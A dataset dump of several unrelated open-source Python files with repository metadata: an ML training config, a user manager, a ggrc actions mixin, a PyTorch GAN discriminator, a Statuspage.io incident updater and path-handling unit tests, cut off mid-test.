maestrojeong/Deep-Hash-Table-ICML18-
|
0c7efa230f950d5a2cd1928ac9f5d99f4276d2b5
|
[
"MIT"
] | 14
|
2018-06-03T16:34:55.000Z
|
2020-09-09T17:02:30.000Z
|
import sys
sys.path.append("../../configs")
#../../configs
from path import EXP_PATH
import numpy as np
DECAY_PARAMS_DICT =\
{
'stair' :
{
128 :{
'a1': {'initial_lr' : 1e-5, 'decay_steps' : 50000, 'decay_rate' : 0.3},
'a2' : {'initial_lr' : 3e-4, 'decay_steps' : 50000, 'decay_rate' : 0.3},
'a3' : {'initial_lr' : 1e-3, 'decay_steps' : 50000, 'decay_rate' : 0.3},
'a4' : {'initial_lr' : 3e-3, 'decay_steps' : 50000, 'decay_rate' : 0.3},
'a5' : {'initial_lr' : 1e-2, 'decay_steps' : 50000, 'decay_rate' : 0.3}
}
},
'piecewise' :
{
128 : {
'a1' : {'boundaries' : [10000, 20000], 'values' : [1e-4, 3e-5, 1e-5]},
'a2' : {'boundaries' : [10000, 20000], 'values' : [3e-4, 1e-4, 3e-5]},
'a3' : {'boundaries' : [10000, 20000], 'values' : [1e-3, 3e-4, 1e-4]},
'a4' : {'boundaries' : [10000, 20000], 'values' : [3e-3, 1e-3, 3e-4]},
'a5' : {'boundaries' : [10000, 20000], 'values' : [1e-2, 3e-3, 1e-3]},
'b1' : {'boundaries' : [20000, 35000], 'values' : [1e-4, 3e-5, 1e-5]},
'b2' : {'boundaries' : [20000, 35000], 'values' : [3e-4, 1e-4, 3e-5]},
'b3' : {'boundaries' : [20000, 35000], 'values' : [1e-3, 3e-4, 1e-4]},
'b4' : {'boundaries' : [20000, 35000], 'values' : [3e-3, 1e-3, 3e-4]},
'b5' : {'boundaries' : [20000, 35000], 'values' : [1e-2, 3e-3, 1e-3]}
}
}
}
ACTIVATE_K_SET = np.arange(1, 5)
K_SET = [1,4,16]
RESULT_DIR = EXP_PATH+"cifar_exps/"
#========================PARAM============================#
DATASET= 'cifar'
GPU_ID = 0
BATCH_SIZE = 128
EPOCH = 300
NSCLASS = 16
# model
EMBED_M= 64
CONV_NAME = 'conv1'
# metric loss
LOSS_TYPE = 'triplet'
MARGIN_ALPHA = 0.3
LAMBDA = 0.003 # regularization for npair
# learning
DECAY_TYPE = 'stair'
DECAY_PARAM_TYPE = 'a3'
| 36.527273
| 88
| 0.47337
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 654
| 0.325535
|
b18129f45c367129cdadaeeefa97748f7c44101b
| 1,133
|
py
|
Python
|
POO punto 2/ManagerUsers.py
|
nan0te/Python-Algorithm-And-DataStructure
|
7b7802b56d397c38f230f5efb687cedc6cc263f3
|
[
"MIT"
] | null | null | null |
POO punto 2/ManagerUsers.py
|
nan0te/Python-Algorithm-And-DataStructure
|
7b7802b56d397c38f230f5efb687cedc6cc263f3
|
[
"MIT"
] | null | null | null |
POO punto 2/ManagerUsers.py
|
nan0te/Python-Algorithm-And-DataStructure
|
7b7802b56d397c38f230f5efb687cedc6cc263f3
|
[
"MIT"
] | null | null | null |
from Profesional import Profesional
from Particular import Particular
from Comercial import Comercial
class ManagerUsers:
userslist = []
def addProfesional(self, name, address, baja, area, titulo):
profesional = Profesional(name, address, baja, area, titulo)
self.userslist.append(profesional)
def addParticular(self, name, address, baja, dni, fechaNac):
particular = Particular(name, address, baja, dni, fechaNac)
self.userslist.append(particular)
|
def addComercial(self, name, address, baja, rubro, cuilt):
comercial = Comercial(name, address, baja, rubro, cuilt)
self.userslist.append(comercial)
def searchUser(self, name):
for user in self.userslist:
if name == user.getName():
user.muestra()
def imprimirUsuarios(self):
for user in self.userslist:
user.muestra()
def deleteUser(self, name):
position = 0
for user in self.userslist:
if name == user.getName():
user.pop(position)
position = position + 1
| 28.325
| 68
| 0.620477
| 397
| 0.350397
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
b1826d4965ab04b828a39c0aa6af7cd8e92a7f3e
| 10,419
|
py
|
Python
|
src/ggrc/models/mixins/with_action.py
|
MikalaiMikalalai/ggrc-core
|
f0f83b3638574bb64de474f3b70ed27436ca812a
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2019-01-12T23:46:00.000Z
|
2019-01-12T23:46:00.000Z
|
src/ggrc/models/mixins/with_action.py
|
MikalaiMikalalai/ggrc-core
|
f0f83b3638574bb64de474f3b70ed27436ca812a
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
src/ggrc/models/mixins/with_action.py
|
MikalaiMikalalai/ggrc-core
|
f0f83b3638574bb64de474f3b70ed27436ca812a
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# Copyright (C) 2020 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Contains WithAction mixin.
A mixin for processing actions on an object in the scope of put request .
"""
from collections import namedtuple, defaultdict
import werkzeug.exceptions as wzg_exceptions
from ggrc import db
from ggrc.login import get_current_user
from ggrc.models.comment import Comment
from ggrc.models.document import Document
from ggrc.models.evidence import Evidence
from ggrc.models.snapshot import Snapshot
from ggrc.models.exceptions import ValidationError
from ggrc.models.reflection import ApiAttributes
from ggrc.models.reflection import Attribute
from ggrc.models.relationship import Relationship
from ggrc.rbac import permissions
class WithAction(object):
"""Mixin for add/remove map/unmap actions processing"""
_api_attrs = ApiAttributes(
Attribute("actions", create=False, update=True, read=False)
)
_operation_order = [
"add_related",
"remove_related",
]
_object_map = {
"Document": Document,
"Evidence": Evidence,
"Comment": Comment,
"Snapshot": Snapshot,
}
_actions = None
_added = None # collect added objects for signals sending
_deleted = None # collect deleted objects fro signals sending
_relationships_map = None
def actions(self, value):
"""Save actions for further processing"""
if value:
self._actions = value.get("actions")
def _validate_actions(self):
"""Validate operation types"""
invalid_actions = ",".join(set(self._actions) - set(self._operation_order))
if invalid_actions:
raise ValueError("Invalid actions found: {}".format(invalid_actions))
def _build_relationships_map(self):
"""Build relationships map"""
self._relationships_map = {
(rel.destination_type, rel.destination_id): rel
for rel in self.related_destinations
}
self._relationships_map.update({
(rel.source_type, rel.source_id): rel
for rel in self.related_sources
})
def _process_operation(self, operation):
"""Process operation actions"""
for action in self._actions[operation]:
# get object class
obj_type = action.get("type")
if not obj_type:
raise ValidationError('type is not defined')
obj_class = self._object_map.get(obj_type)
if not obj_class:
raise ValueError('Invalid action type: {type}'.format(type=obj_type))
# get handler class
action_type = '{type}Action'.format(type=obj_type)
action_class = getattr(self, action_type, None)
if not action_class:
raise ValueError('Invalid action type: {type}'.format(type=obj_type))
# process action
# pylint: disable=not-callable
added, deleted = getattr(action_class(), operation)(self, action)
# collect added/deleted objects
self._added.extend(added)
self._deleted.extend(deleted)
def process_actions(self):
"""Process actions"""
if not self._actions:
return {}, []
self._validate_actions()
self._added = []
self._deleted = []
for operation in self._operation_order:
if operation not in self._actions:
continue
if not self._actions[operation]:
continue
self._build_relationships_map()
self._process_operation(operation)
# collect added/deleted objects for signals sending
added = defaultdict(list)
for obj in self._added:
added[obj.__class__].append(obj)
return added, self._deleted
class BaseAction(object):
"""Base action"""
AddRelated = namedtuple("AddRelated", ["id", "type"])
MapRelated = namedtuple("MapRelated", ["id", "type"])
RemoveRelated = namedtuple("RemoveRelated", ["id", "type"])
def add_related(self, parent, _action):
"""Add/map object to parent"""
added = []
if _action.get("id"):
action = self._validate(_action, self.MapRelated)
obj = self._get(action)
else:
action = self._validate(_action, self.AddRelated)
obj = self._create(parent, action)
added.append(obj)
from ggrc.models.hooks.common import check_mapping_permissions
check_mapping_permissions(parent, obj)
rel = Relationship(source=parent,
destination=obj,
context=parent.context)
added.append(rel)
return added, []
@staticmethod
def _validate(_action, ntuple):
try:
return ntuple(**_action)
except TypeError:
# According to documentation _fields is not private property
# but public, '_' added to prevent conflicts with tuple field names
# pylint: disable=protected-access
missing_fields = set(ntuple._fields) - set(_action)
raise ValidationError(
"Fields {} are missing for action: {!r}".format(
", ".join(missing_fields), _action
)
)
# pylint: disable=unused-argument,no-self-use
def _create(self, parent, action):
raise ValidationError("Can't create {type} object".format(
type=action.type))
def _get(self, action):
"""Get object specified in action"""
if not action.id:
raise ValueError("id is not defined")
# pylint: disable=protected-access
obj_class = WithAction._object_map[action.type]
obj = obj_class.query.get(action.id)
if not obj:
raise ValueError(
'Object not found: {type} {id}'.format(type=action.type,
id=action.id))
return obj
def remove_related(self, parent, _action):
"""Remove relationship"""
action = self._validate(_action, self.RemoveRelated)
deleted = []
obj = self._get(action)
# pylint: disable=protected-access
rel = parent._relationships_map.get((obj.type, obj.id))
if rel:
db.session.delete(rel)
deleted.append(rel)
return [], deleted
def _check_related_permissions(self, obj):
"""Check permissions before deleting related Evidence or Document"""
if not permissions.is_allowed_delete(
obj.type, obj.id, obj.context_id) \
and not permissions.has_conditions("delete", obj.type):
raise wzg_exceptions.Forbidden()
if not permissions.is_allowed_delete_for(obj):
raise wzg_exceptions.Forbidden()
class DocumentAction(BaseAction):
"""Document action"""
AddRelated = namedtuple("AddRelated", ["id",
"type",
"kind",
"link",
"title"])
@staticmethod
def _validate_parent(parent):
"""Validates if paren in allowed parents"""
from ggrc.models.object_document import Documentable
if not isinstance(parent, Documentable):
raise ValueError('Type "{}" is not Documentable.'.format(parent.type))
def _create(self, parent, action):
self._validate_parent(parent)
obj = Document(link=action.link,
title=action.title,
kind=action.kind,
context=parent.context)
return obj
def remove_related(self, parent, _action):
"""Remove relationship"""
action = self._validate(_action, self.RemoveRelated)
deleted = []
obj = self._get(action)
# pylint: disable=protected-access
rel = parent._relationships_map.get((obj.type, obj.id))
self._check_related_permissions(obj)
if rel:
db.session.delete(rel)
deleted.append(rel)
return [], deleted
class EvidenceAction(BaseAction):
"""Evidence action"""
AddRelatedTuple = namedtuple("AddRelated", ["id",
"type",
"kind",
"link",
"title",
"source_gdrive_id"])
def add_related_wrapper(self, id, type, kind, link,
title, source_gdrive_id=''):
"""Used to add 'default' value to the named tuple
In case of Evidence.FILE source_gdrive_id is mandatory
"""
return self.AddRelatedTuple(id, type, kind, link,
title, source_gdrive_id)
AddRelated = add_related_wrapper
AddRelated._fields = AddRelatedTuple._fields
def _create(self, parent, action):
obj = Evidence(link=action.link,
title=action.title,
kind=action.kind,
source_gdrive_id=action.source_gdrive_id,
context=parent.context)
return obj
def remove_related(self, parent, _action):
"""Remove relationship"""
action = self._validate(_action, self.RemoveRelated)
deleted = []
obj = self._get(action)
# pylint: disable=protected-access
rel = parent._relationships_map.get((obj.type, obj.id))
self._check_related_permissions(obj)
if rel:
db.session.delete(rel)
deleted.append(rel)
obj.status = Evidence.DEPRECATED
return [], deleted
class CommentAction(BaseAction):
"""Comment action"""
AddRelated = namedtuple("AddRelated", ["id",
"type",
"description",
"custom_attribute_definition_id"])
def _create(self, parent, action):
# get assignee type
current_user = get_current_user()
assignee_types = parent.assignees.get(current_user, [])
assignee_type = ",".join(assignee_types) or None
# create object
cad_id = action.custom_attribute_definition_id
if not cad_id:
obj = Comment(description=action.description,
assignee_type=assignee_type,
context=parent.context)
else:
obj = Comment(description=action.description,
custom_attribute_definition_id=cad_id,
assignee_type=assignee_type,
context=parent.context)
return obj
class SnapshotAction(BaseAction):
"""Snapshot action"""
| 33.501608
| 79
| 0.613783
| 9,644
| 0.925617
| 0
| 0
| 814
| 0.078126
| 0
| 0
| 2,149
| 0.206258
|
b183550bc53fd30c394fa716585596aa04c10f32
| 99
|
py
|
Python
|
tests/__init__.py
|
Fokko/example-library-python
|
b20b69c6dae93c32cd3d2c86a644abbf6b85199b
|
[
"Apache-2.0"
] | null | null | null |
tests/__init__.py
|
Fokko/example-library-python
|
b20b69c6dae93c32cd3d2c86a644abbf6b85199b
|
[
"Apache-2.0"
] | null | null | null |
tests/__init__.py
|
Fokko/example-library-python
|
b20b69c6dae93c32cd3d2c86a644abbf6b85199b
|
[
"Apache-2.0"
] | null | null | null |
import sys, os
path = os.path.dirname(__file__)
if path not in sys.path:
sys.path.append(path)
| 19.8
| 32
| 0.717172
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
b184dd55b715329d1a0d130a5cfdba08a4a14ccb
| 3,457
|
py
|
Python
|
GAN_discriminator.py
|
SEE-MOF/Generation_of_atmospheric_cloud_fields_using_GANs
|
6dce1447e140f5724638ac576bbf913af4e8a0e6
|
[
"MIT"
] | null | null | null |
GAN_discriminator.py
|
SEE-MOF/Generation_of_atmospheric_cloud_fields_using_GANs
|
6dce1447e140f5724638ac576bbf913af4e8a0e6
|
[
"MIT"
] | null | null | null |
GAN_discriminator.py
|
SEE-MOF/Generation_of_atmospheric_cloud_fields_using_GANs
|
6dce1447e140f5724638ac576bbf913af4e8a0e6
|
[
"MIT"
] | 1
|
2020-12-11T15:03:36.000Z
|
2020-12-11T15:03:36.000Z
|
import torch
class GAN_discriminator (torch.nn.Module):
def __init__(self, H):
#for GAN
# H=[5, 256, 128, 128, 5, 1, 64, 128, 256, 256, 4096, 1]
#for CGAN
# H =[8, 256, 128, 64, 8, 9, 64, 128, 256, 256, 4096, 1]
super(GAN_discriminator, self).__init__()
#region
self.upsample0 = torch.nn.ConvTranspose2d(H[0],H[0],(4,1), stride=(4,1))
self.convolution0 = torch.nn.Conv2d(H[0],H[1],(5,3),padding=(2,1))
#relu
self.batchNorm0 = torch.nn.BatchNorm2d(H[1])
self.upsample1 = torch.nn.ConvTranspose2d(H[1], H[1], (4, 1), stride=(4, 1))
self.convolution1 = torch.nn.Conv2d(H[1], H[2], (5, 3), padding=(2, 1))
# relu
self.batchNorm1 = torch.nn.BatchNorm2d(H[2])
self.upsample2 = torch.nn.ConvTranspose2d(H[2], H[2], (2, 1), stride=(2, 1))
self.convolution2 = torch.nn.Conv2d(H[2], H[3], (3, 3), padding=(1, 1))
# relu
self.batchNorm2 = torch.nn.BatchNorm2d(H[3])
self.upsample3 = torch.nn.ConvTranspose2d(H[3], H[3], (2, 1), stride=(2, 1))
self.convolution3 = torch.nn.Conv2d(H[3], H[4], (3, 3), padding=(1, 1))
# relu
self.batchNorm3 = torch.nn.BatchNorm2d(H[4])
#endregion
#concatenate
self.convolution5 = torch.nn.Conv2d(H[5],H[6],(3,3),stride=(2,2),padding=(1,1))
#relu
self.convolution6 = torch.nn.Conv2d(H[6], H[7], (3, 3), stride=(2, 2),padding=(1,1))
# relu
self.convolution7 = torch.nn.Conv2d(H[7], H[8], (3, 3), stride=(2, 2),padding=(1,1))
# relu
self.convolution8 = torch.nn.Conv2d(H[8], H[9], (3, 3), stride=(2, 2),padding=(1,1))
# relu
#flatten
self.dense9=torch.nn.Linear(H[10],H[11])
self.sigmoid9 = torch.nn.Sigmoid()
def forward(self, x, scene):
#region
if x != None:
h_upsample0 = self.upsample0(x)
h_conv0 = self.convolution0(h_upsample0)
h_relu0 = torch.nn.functional.leaky_relu(h_conv0,0.2)
h_batch0 = self.batchNorm0(h_relu0)
h_upsample1 = self.upsample1(h_batch0)
h_conv1 = self.convolution1(h_upsample1)
h_relu1 = torch.nn.functional.leaky_relu(h_conv1, 0.2)
h_batch1 = self.batchNorm1(h_relu1)
h_upsample2 = self.upsample2(h_batch1)
h_conv2 = self.convolution2(h_upsample2)
h_relu2 = torch.nn.functional.leaky_relu(h_conv2, 0.2)
h_batch2 = self.batchNorm2(h_relu2)
h_upsample3 = self.upsample3(h_batch2)
h_conv3 = self.convolution3(h_upsample3)
h_relu3 = torch.nn.functional.leaky_relu(h_conv3, 0.2)
h_batch3 = self.batchNorm3(h_relu3)
#endregion
h_conc4 = torch.cat((h_batch3, scene),1)
else:
h_conc4=scene
h_conv5 = self.convolution5(h_conc4)
h_relu5 = torch.nn.functional.leaky_relu(h_conv5, 0.2)
h_conv6 = self.convolution6(h_relu5)
h_relu6 = torch.nn.functional.leaky_relu(h_conv6, 0.2)
h_conv7 = self.convolution7(h_relu6)
h_relu7 = torch.nn.functional.leaky_relu(h_conv7, 0.2)
h_conv8 = self.convolution8(h_relu7)
h_relu8 = torch.nn.functional.leaky_relu(h_conv8, 0.2)
h_flat9 = h_relu8.view(len(scene),-1)
h_dense9 = self.dense9(h_flat9)
h_out=self.sigmoid9(h_dense9)
return h_out
| 37.576087
| 92
| 0.582586
| 3,443
| 0.99595
| 0
| 0
| 0
| 0
| 0
| 0
| 229
| 0.066242
|
b1867ef42ce297b26321e0a3ab432ed29359ffca
| 7,770
|
py
|
Python
|
statuspage_io.py
|
spyder007/pi-monitoring
|
fab660adcf6ed89a591a6ed2060d653369843e6e
|
[
"MIT"
] | null | null | null |
statuspage_io.py
|
spyder007/pi-monitoring
|
fab660adcf6ed89a591a6ed2060d653369843e6e
|
[
"MIT"
] | null | null | null |
statuspage_io.py
|
spyder007/pi-monitoring
|
fab660adcf6ed89a591a6ed2060d653369843e6e
|
[
"MIT"
] | null | null | null |
import logging
import statuspage_io_client
import configuration
from enums import OpLevel
logger = logging.getLogger(__name__)
class Incident:
"""Incident Class
This class represents the details about a Statuspage.io incident
Attributes:
name: The incident name.
description: The incident description.
"""
name: str = "Incident Name"
description: str = "Incident Description"
class IncidentResult:
"""IncidentResult Class
This class represents information about incidents created or resolved as part of a status change
Attributes:
incidentCreated: True if an incident was created, false otherwise.
incidentResolved: True if an incident was created, false otherwise.
"""
incidentCreated: bool = False
incidentResolved: bool = False
incident: Incident
def __init__(self):
self.incidentCreated = False
self.incidentResolved = False
self.incident = Incident()
class StatusResult:
"""StatusResult Class
This class represents information about actions taken during a check and update.
Attributes:
statusChanged: True if the status has changed from the previous check, false otherwise.
incidentResult: An instance of [IncidentResult][statuspage_io.IncidentResult].
"""
statusChanged: bool = False
incidentResult: IncidentResult = IncidentResult()
def __init__(self):
self.incidentResult = IncidentResult()
class StatusPageOperator:
"""StatusResult Class
This class represents information about actions taken during a check and update.
Attributes:
config: An instance of [StatusPageSettings][configuration.StatusPageSettings] which contains settings for Statuspage.io communication
client: An instance of [StatusPageClient][statuspage_io_client.StatusPageClient], built from the configuration values provided.
"""
config: configuration.StatusPageSettings = configuration.StatusPageSettings()
client: statuspage_io_client.StatusPageClient
def __init__(self, statusPageConfig: configuration.StatusPageSettings):
""" Constructor
Initialize the instance using the provided [StatusPageSettings][configuration.StatusPageSettings].
"""
self.config = statusPageConfig
self.client = statuspage_io_client.StatusPageClient(
self.config.apiKey, self.config.pageId)
def IsConfigured(self) -> bool:
""" Validate configuration data
Returns:
True if the operator has a valid configuration, False otherwise.
"""
return self.config.apiKey != ""
def UpdateComponentStatus(self, componentId: str, opLevel: OpLevel, incidentDetails: Incident = {}) -> StatusResult:
""" Update Component Status
Using the provided OpLevel, determine the component's statuspage.io status.
If the incoming `opLevel` is [Operational][enums.OpLevel] and the statuspage.io status is not, the component's status will be changed to `operational`, and any open incidents for that component will be resolved.
If the incoming `opLevel` is any other value and the statuspage.io status is operational, the component's status will be changed to `major_outage` and an incident will be created using the provided `incidentDetails`
Args:
componentId: The component ID to check
opLevel: The current OpLevel for the provided component
incidentDetails: An instance of [Incident][statuspage_io.Incident] which has the details of the incident to be created, if necessary.
Returns:
An instance of [StatusResult][statuspage_io.StatusResult]
"""
if opLevel == OpLevel.Operational:
componentStatus = "operational"
else:
componentStatus = "major_outage"
if (componentStatus not in self.client.component_status_list):
raise ValueError(str.format(
"Invalid status '{0}'. Valid values are {1}", componentStatus, self.client.component_status_list))
result = StatusResult()
component = self.client.getComponent(componentId)
if (component.status != componentStatus):
result.statusChanged = True
logger.info("Changing status from %s to %s",
component.status, componentStatus)
self._updateComponentStatus(componentId, componentStatus)
result.incidentResult = self._processIncidentOnStatusChange(
componentId, componentStatus, incidentDetails)
return result
def _updateComponentStatus(self, componentId, newComponentStatus):
if (newComponentStatus not in self.client.component_status_list):
raise ValueError(str.format(
"Invalid status '{0}'. Valid values are {1}", newComponentStatus, self.client.component_status_list))
logger.debug("Setting component status to %s: %s",
newComponentStatus, componentId)
payload = {"component": {"status": newComponentStatus}}
self.client.updateComponent(componentId, payload)
def _filter_set(self, incidents, componentId):
def iterator_func(incident):
for comp in incident.components:
if comp.id == componentId:
return True
return False
return filter(iterator_func, incidents)
def _getAssociatedIncident(self, componentId):
result = self.client.getUnresolvedIncidents()
return list(self._filter_set(result, componentId))
def _processIncidentOnStatusChange(self, componentId: str, newComponentStatus: str, incidentDetails: Incident) -> IncidentResult:
''' Create or Close incidents based on the incoming component status
For now, if it's operational, close open incidents, and if it's not operational, create a new
ticket if one isn't already open for this component. Future state will involve more detail around outage and maintenance
'''
incidentResult = IncidentResult()
incidentResult.incident = incidentDetails
associatedIncidents = self._getAssociatedIncident(componentId)
asscIncidentCount = len(associatedIncidents)
logger.info("Associated Incidents for %s: %d",
componentId, asscIncidentCount)
if (newComponentStatus == "operational" and asscIncidentCount > 0):
for incident in associatedIncidents:
self._closeIncident(incident.id)
incidentResult.incidentResolved = True
elif (newComponentStatus == "major_outage" and asscIncidentCount == 0):
self._createIncident(
componentId, newComponentStatus, incidentDetails)
incidentResult.incidentCreated = True
return incidentResult
def _closeIncident(self, incidentId):
logger.info("Closing incident %s", incidentId)
payload = {"incident": {"status": "resolved"}}
self.client.updateIncident(incidentId, payload)
def _createIncident(self, componentId, newComponentStatus: str, incidentDetails: Incident):
logger.info("Creating incident: Component %s - New Component Status %s",
componentId, newComponentStatus)
payload = {"incident":
{
"name": incidentDetails.name,
"status": "investigating",
"body": incidentDetails.description,
"component_ids": [componentId],
"components": {componentId: newComponentStatus}
}
}
self.client.createIncident(payload)
| 38.85
| 223
| 0.674775
| 7,630
| 0.981982
| 0
| 0
| 0
| 0
| 0
| 0
| 3,233
| 0.416088
|
b188895e8bd69c46255cb2668635f56b60539874
| 14,875
|
py
|
Python
|
tests/test_gpath.py
|
ConductorTechnologies/ciopath
|
574bfc38859cc68a80b98f8b0cf0d9aeddb646e5
|
[
"MIT"
] | 1
|
2020-10-13T07:50:19.000Z
|
2020-10-13T07:50:19.000Z
|
tests/test_gpath.py
|
ConductorTechnologies/ciopath
|
574bfc38859cc68a80b98f8b0cf0d9aeddb646e5
|
[
"MIT"
] | null | null | null |
tests/test_gpath.py
|
ConductorTechnologies/ciopath
|
574bfc38859cc68a80b98f8b0cf0d9aeddb646e5
|
[
"MIT"
] | null | null | null |
""" test gpath
isort:skip_file
"""
import os
import sys
import unittest
try:
from unittest import mock
except ImportError:
import mock
SRC = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), "src")
if SRC not in sys.path:
sys.path.insert(0, SRC)
from ciopath.gpath import Path
sys.modules["glob"] = __import__("mocks.glob", fromlist=["dummy"])
class BadInputTest(unittest.TestCase):
def test_empty_input(self):
with self.assertRaises(ValueError):
self.p = Path("")
class RootPath(unittest.TestCase):
def test_root_path(self):
self.p = Path("/")
self.assertEqual(self.p.fslash(), "/")
self.assertEqual(self.p.bslash(), "\\")
def test_drive_letter_root_path(self):
self.p = Path("C:\\")
self.assertEqual(self.p.fslash(), "C:/")
self.assertEqual(self.p.bslash(), "C:\\")
class SpecifyDriveLetterUse(unittest.TestCase):
def test_remove_from_path(self):
self.p = Path("C:\\a\\b\\c")
self.assertEqual(self.p.fslash(with_drive=False), "/a/b/c")
self.assertEqual(self.p.bslash(with_drive=False), "\\a\\b\\c")
def test_remove_from_root_path(self):
self.p = Path("C:\\")
self.assertEqual(self.p.fslash(with_drive=False), "/")
self.assertEqual(self.p.bslash(with_drive=False), "\\")
class AbsPosixPathTest(unittest.TestCase):
def setUp(self):
self.p = Path("/a/b/c")
def test_fslash_out(self):
self.assertEqual(self.p.fslash(), "/a/b/c")
def test_win_path_out(self):
self.assertEqual(self.p.bslash(), "\\a\\b\\c")
class AbsWindowsPathTest(unittest.TestCase):
def setUp(self):
self.p = Path("C:\\a\\b\\c")
def test_fslash_out(self):
self.assertEqual(self.p.fslash(), "C:/a/b/c")
def test_win_path_out(self):
self.assertEqual(self.p.bslash(), "C:\\a\\b\\c")
# consider just testing on both platforms
def test_os_path_out(self):
with mock.patch("os.name", "posix"):
self.assertEqual(self.p.os_path(), "C:/a/b/c")
with mock.patch("os.name", "nt"):
self.assertEqual(self.p.os_path(), "C:\\a\\b\\c")
class PathStringTest(unittest.TestCase):
def test_path_emits_string_posix(self):
input_file = "/path/to/thefile.jpg"
p = Path(input_file)
self.assertEqual(str(p), input_file)
def test_path_emits_string_with_drive(self):
input_file = "C:/path/to/thefile.jpg"
p = Path(input_file)
self.assertEqual(str(p), input_file)
def test_path_emits_string_relative(self):
input_file = "path/to/thefile.jpg"
p = Path(input_file)
self.assertEqual(str(p), input_file)
class WindowsMixedPathTest(unittest.TestCase):
def test_abs_in_fslash_out(self):
self.p = Path("\\a\\b\\c/d/e")
self.assertEqual(self.p.fslash(), "/a/b/c/d/e")
def test_abs_in_bslash_out(self):
self.p = Path("\\a\\b\\c/d/e")
self.assertEqual(self.p.bslash(), "\\a\\b\\c\\d\\e")
def test_letter_abs_in_fslash_out(self):
self.p = Path("C:\\a\\b\\c/d/e")
self.assertEqual(self.p.fslash(), "C:/a/b/c/d/e")
def test_letter_abs_in_bslash_out(self):
self.p = Path("C:\\a\\b\\c/d/e")
self.assertEqual(self.p.bslash(), "C:\\a\\b\\c\\d\\e")
class MiscPathTest(unittest.TestCase):
def test_many_to_single_backslashes_bslash_out(self):
self.p = Path("C:\\\\a\\b///c")
self.assertEqual(self.p.bslash(), "C:\\a\\b\\c")
class PathExpansionTest(unittest.TestCase):
def setUp(self):
self.env = {
"HOME": "/users/joebloggs",
"SHOT": "/metropolis/shot01",
"DEPT": "texturing",
}
def test_posix_tilde_input(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("~/a/b/c")
self.assertEqual(self.p.fslash(), "/users/joebloggs/a/b/c")
def test_posix_var_input(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("$SHOT/a/b/c")
self.assertEqual(self.p.fslash(), "/metropolis/shot01/a/b/c")
def test_posix_two_var_input(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("$SHOT/a/b/$DEPT/c")
self.assertEqual(self.p.fslash(), "/metropolis/shot01/a/b/texturing/c")
def test_windows_var_input(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("$HOME\\a\\b\\c")
self.assertEqual(self.p.bslash(), "\\users\\joebloggs\\a\\b\\c")
self.assertEqual(self.p.fslash(), "/users/joebloggs/a/b/c")
def test_tilde_no_expand(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("~/a/b/c", no_expand=True)
self.assertEqual(self.p.fslash(), "~/a/b/c")
def test_posix_var_no_expand(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("$SHOT/a/b/c", no_expand=True)
self.assertEqual(self.p.fslash(), "$SHOT/a/b/c")
def no_expand_variable_considered_relative(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("$SHOT/a/b/c", no_expand=True)
self.assertTrue(self.p.relative)
self.assertFalse(self.p.absolute)
def expanded_variable_considered_absolute(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("$SHOT/a/b/c", no_expand=False)
self.assertFalse(self.p.relative)
self.assertTrue(self.p.absolute)
class PathContextExpansionTest(unittest.TestCase):
def setUp(self):
self.env = {
"HOME": "/users/joebloggs",
"SHOT": "/metropolis/shot01",
"DEPT": "texturing",
}
self.context = {
"HOME": "/users/janedoe",
"FOO": "fooval",
"BAR_FLY1_": "bar_fly1_val",
"ROOT_DIR": "/some/root",
}
def test_path_replaces_context(self):
self.p = Path("$ROOT_DIR/thefile.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/some/root/thefile.jpg")
def test_path_replaces_multiple_context(self):
self.p = Path("$ROOT_DIR/$BAR_FLY1_/thefile.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/some/root/bar_fly1_val/thefile.jpg")
def test_path_context_overrides_env(self):
self.p = Path("$HOME/thefile.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/users/janedoe/thefile.jpg")
def test_path_leave_unknown_variable_in_tact(self):
self.p = Path("$ROOT_DIR/$BAR_FLY1_/$FOO/thefile.$F.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/some/root/bar_fly1_val/fooval/thefile.$F.jpg")
def test_path_replaces_context_braces(self):
self.p = Path("${ROOT_DIR}/thefile.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/some/root/thefile.jpg")
def test_path_replaces_multiple_context_braces(self):
self.p = Path("${ROOT_DIR}/${BAR_FLY1_}/thefile.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/some/root/bar_fly1_val/thefile.jpg")
def test_path_context_overrides_env_braces(self):
self.p = Path("${HOME}/thefile.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/users/janedoe/thefile.jpg")
def test_path_leave_unknown_variable_in_tact_braces(self):
self.p = Path("${ROOT_DIR}/${BAR_FLY1_}/${FOO}/thefile.$F.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/some/root/bar_fly1_val/fooval/thefile.$F.jpg")
class PathLengthTest(unittest.TestCase):
def test_len_with_drive_letter(self):
self.p = Path("C:\\aaa\\bbb/c")
self.assertEqual(len(self.p), 12)
def test_len_with_no_drive_letter(self):
self.p = Path("\\aaa\\bbb/c")
self.assertEqual(len(self.p), 10)
def test_depth_with_drive_letter(self):
self.p = Path("C:\\aaa\\bbb/c")
self.assertEqual(self.p.depth, 3)
def test_depth_with_no_drive_letter(self):
self.p = Path("\\aaa\\bbb/c")
self.assertEqual(self.p.depth, 3)
def test_depth_with_literal_rel_path(self):
self.p = Path("aaa\\bbb/c")
self.assertEqual(self.p.depth, 3)
class AbsolutePathCollapseDotsTest(unittest.TestCase):
def test_path_collapses_single_dot(self):
p = Path("/a/b/./c")
self.assertEqual(p.fslash(), "/a/b/c")
def test_path_collapses_double_dot(self):
p = Path("/a/b/../c")
